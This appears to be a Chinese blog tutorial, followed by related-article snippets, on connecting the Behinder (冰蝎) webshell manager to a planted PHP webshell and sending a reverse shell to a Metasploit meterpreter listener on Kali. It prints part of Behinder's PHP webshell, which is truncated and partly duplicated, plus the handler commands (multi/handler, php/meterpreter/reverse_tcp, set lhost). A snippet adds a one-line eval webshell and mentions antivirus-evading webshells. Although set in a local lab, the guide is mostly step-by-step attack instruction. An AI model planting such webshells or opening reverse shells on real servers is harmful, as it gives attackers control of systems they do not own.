冰蝎 连接木马到反弹shell拿到权限全过程

最新推荐文章于 2024-01-16 11:55:15 发布
原创 最新推荐文章于 2024-01-16 11:55:15 发布 · 1.3w 阅读 · 44 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

一.冰蝎简介

什么是冰蝎

“冰蝎”是一个动态二进制加密网站管理客户端。
在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。
基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。

一.冰蝎连接getshell方法

1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16]

<?php @errorreporting(0); session_start(); $key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond <?php @error_reporting(0); session_start(); $key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION[‘k’]=$key; $post=file_get_contents(“php://input”); if(!extension_loaded(‘openssl’)) { $t=”base64“.”decode”; $post=$t($post.””); for($i=0;$i

二.冰蝎getshell

1.建好的木马放入我们phpstudy网站的根目录
在这里插入图片描述

2.到我们的位置为 192.168.43.61/1.php
在这里插入图片描述

3.始连接冰蝎,点击保存

在这里插入图片描述
在这里插入图片描述

在冰蝎处 显示为此页面,则表示连接成功

三.开始反弹shell启用监听meterpreter功能

1.点击反弹shell
在这里插入图片描述

2.在IP地址上写上你本机kali的ip

2.1查找kali ip 的方法 命令框中输入 ip addr
在这里插入图片描述

3.2填上ip和端口,端口可以任意填写
在这里插入图片描述

此时注意不用那么快点击“给我连按钮”

4.先打开kali的msf监听设备 在命令框中输入msfconsole
在这里插入图片描述

此时为打开状态

5.使用use exploit/multi/handler 命令
在这里插入图片描述

此时弹出让我们输入payload的命令我们将此命令输入set payload php/meterpreter/reverse_tcp
在这里插入图片描述

此时输入成功

6.show options 我们就可以看设置了,我们会发现我们的靶机已经连上了
在这里插入图片描述

7.接着我们连上我们的主机 set lhost 192.168.43.61
在这里插入图片描述

8.Show options 我们会发现我们的主机已经连上
在这里插入图片描述

9.执行 exploit 命令执行监听,此时我们就可以返回冰蝎反弹shell执行接下来的操作
在这里插入图片描述

10 点击给我连
在这里插入图片描述

11.我们在返回kali 此时我们就已经可以开始监听了
在这里插入图片描述

12.执行 sysinfo 我们就可以知道靶机的系统信息
在这里插入图片描述

结束

黑客渗透视频教程,扫码免费领

在这里插入图片描述

zkzq
关注
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
wordpress 靶机渗透
猎荒者
02-14 2850
人过留名,雁过留声 人生天地间,凡有大动静处 必有猪头 环境准备 VMware workstation Pro12 Kali 虚拟机 (攻击机IP:10.10.16.133) Wordpress 虚拟机 (靶机IP:10.10.16.135) NAT 网络模式 安装靶机 在导入靶机的时候出现版本不兼容的现象。 用记事本打开靶机安装包里面的 .vmx 文件,修改版本好为本地的 VM 的版本...
文件上传漏洞靶场:upload-labs安装和第一关
selecthch的博客
12-10 2103
安装: 靶场安装:靶机系统文件下载:https://github.com/Tj1ngwe1/upload-labs 下载后解压到自己phpstudy的www目录下,在浏览器输入:http://localhost/upload-labs/ 或者:http://127.0.0.1/upload-labs/ 安装完成。 第一关: 目标上传一个webshell到服务器。 提示让上传一个...
webshell管理工具之中国蚁剑
xdjxi的博客
01-16 736
实验环境物理机即可 实验工具:中国蚁剑,phpstudy,dvwa网站 一:打开phpstudy开启apache和mysql 1:将dvwa网站放到www目录下 2:用浏览器进行访问 3:登录dvwa网站进行低等级下的文件上传 4:编写一句话木马进行上传 <?php @eval($_POST['password']); ?> 5:打开中国蚁剑进行连接 添加数据 ...
冰蝎利用免杀webshell链接,反弹shell(附免杀webshell和工具)
qq_41132792的博客
09-06 2581
我们这里需要的是java环境,版本的话最好就是安装Java最新的了,Windows也是可以使用的,我这里主要介绍的是Linux上使用,我是基于kali中使用的。我们因为是实验的关系,本地搭建一个网站就好了,Windows的选择phpstudy就好,Linux的百度一下安装下apache即可。然后会弹出我们的图形界面,这里我们就先停一下,将我们的木马传到/var/www/html这个文件夹中,这里我们可以自定义请求头,然后保存即可,保存完我们双击进去。首先我们启动冰蝎,这里我将它放到了我的工具包中,
冰蝎反弹shell
weixin_50574090的博客
09-14 1599
攻击端ip:192.168.1.114 靶机ip:192.168.1.87 kali:192.168.1.119 冰蝎压缩包里面server文件中的php 文件放到靶机已安装好的apache安装目录中的www目录下 启动apache服务 尝试访问shell.php文件 打开冰蝎,右击新增如下,保存。 选择已添加的地址,点击打开,选择反弹shell 打开kali,执行msfconsole --->use exploit/multi/handler --->set p...
冰蝎下的反弹shell连接msfconsole
热门推荐
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
冰蝎
世间繁华梦一出
03-04 3795
冰蝎什么是冰蝎冰蝎的特点加密原理通信过程 什么是冰蝎? “冰蝎”是一个动态二进制加密网站管理客户端。在实战中,第一代webshell管理工具"菜刀"的流量特征非常明显,很容易就被安全设备检测到。基于流量加密的webshell变得越来越多,"冰蝎"在此应运而生。 "冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v2.0.1,兼容性较之前的版本有较大提升。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等,功能非常强大 冰蝎的特点 流量加密
冰蝎反弹shell到MSF
渗透之路,攻防之间皆学问
04-15 6845
我们利用冰蝎获取到了一个shell,那接下来要反弹shell到VPS(阿里云)中的MSF,方便进行后渗透。 1. 如下,获取到了shell 2. 选择反弹shell 如下填写vps的ip,和监听的端口。下面有提示使用的payload我们将其填入msf中,对于不同的shell,这里生成的msf模块都会不一样,我们按照它给的填入就行 3. vps启动msf,设置本地的内网的网卡和监听的端口,如果只有一块网卡的话也可以填0.0.0.0,端口和冰蝎反弹shell的填写的端口一样。 4. 在冰
冰蝎不出网反弹shell
09-06
- *1* [冰蝎 连接木马反弹shell拿到权限全过程](https://blog.youkuaiyun.com/hackzkaq/article/details/110122723)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
【每天学一点新知识】getshell???webshell???
RexHa的博客
10-08 7514
getshell就是可以通过某种漏洞达到留下后门的操作,可以通过程序的bug进入后台。 往往应用于上传一句话木马,然后利用菜刀、蚁剑等工具连接一句话在对方服务器的绝对路径,然后获得服务器的各个盘符的信息。
【横向移动】内网渗透横向移动获取另台主机的shell
weixin_45588247的博客
07-30 5112
在攻击者获取到某台内网机器的控制权限之后,进一步会考虑如何在内网进行横向移动,以及攻击域控服务器,本文总结了突破边界后进一步的攻击技巧,拿到内网机器的密码或Hash进行横向移动的方式
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
02-06
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1745
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
冰蝎4.0jsp木马浅析
最新发布
Dokii_i的博客
01-16 4577
这里简单学习一下冰蝎是怎么运行的,如何通过加密解密来绕过一些常见的waf设备在看完了冰蝎是怎么连接之后,对于冰蝎的工作原理也有了一定的理解,本地和服务器端都做加密和解密的操作,以此来绕过流量检测设备以及一些waf,而且通过动态的加载class字节码,也可以绕过一些普通的webshell查杀设备,后续的一些绕过,可以在加密方式以及特征值的修改上入手。
kali监听win2008;反弹shell;msf生成木马;留后门;权限维持;
xiaochenhang的博客
08-30 1504
2、在win2008里面使用这条命令,将创建⼀个abc计划任务,每⼀分钟 执⾏⼀次abcd.exe;1、填写自己kali地址和要使用的端口号;生成abcd.exe木马;4、kali使用msfconsole工具进行渗透。注意abcd.exe路径;在计算机管理里面可以看见。...
反弹shell---生成木马反弹shell(Windows)
weixin_50956890的博客
05-04 4491
Windows反弹shell的一种方式--生成木马
php冰蝎一句话,利用动态二进制加密实现新型一句话木马之PHP篇(转)冰蝎
weixin_32550525的博客
04-05 970
概述本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是:利用动态二进制加密实现新型一句话木马之Java篇利用动态二进制加密实现新型一句话木马之.net篇利用动态二进制加密实现新型一句话木马...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值